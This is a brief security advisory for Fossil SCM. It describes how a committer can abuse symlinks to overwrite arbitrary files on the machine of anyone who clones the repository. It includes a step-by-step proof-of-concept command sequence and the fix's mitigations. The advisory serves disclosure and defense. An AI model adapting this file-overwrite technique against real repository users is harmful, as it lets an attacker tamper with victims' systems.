Fossil SCM

A malicious user with check-in privileges can overwrite arbitrary files on a victim's system by exploiting weaknesses in the symlink mechanism of Fossil. Max Justicz provides the following demo:

fossil init oops.fossil
mkdir checkout
cd checkout
fossil open ../oops.fossil

ln -s /tmp/ link
fossil add link
fossil commit -m "add link"

echo "oops" > link/foo.txt
fossil add link/foo.txt
fossil commit -m "add foo"

# Remove the file so we can show the exploit works
rm /tmp/foo.txt

cd ..
fossil serve oops.fossil

# In another terminal
fossil clone http://localhost:8080/oops.fossil oops2.fossil
mkdir checkout2
cd checkout2
fossil open ../oops2.fossil

# /tmp/foo.txt was created!
cat /tmp/foo.txt

Mitigations from check-in ff98dd5af61aef30ca4:

• The allow-symlinks setting is off by default. Users must explicitly enable symlink support in order for Fossil to create symlinks.

• The allow-symlinks setting is no longer a versioned setting. It must be set manually by the developer who wants to use it.

• The allow-symlinks setting no longer propagates via clone. The setting continues to be off by default for clones even if it is on in the server.

Additional defenses:

• When checking out files, do not write files that are beneath a symlink in the check-out.

• When doing a "fossil add" ignore files that are beneath a symlink.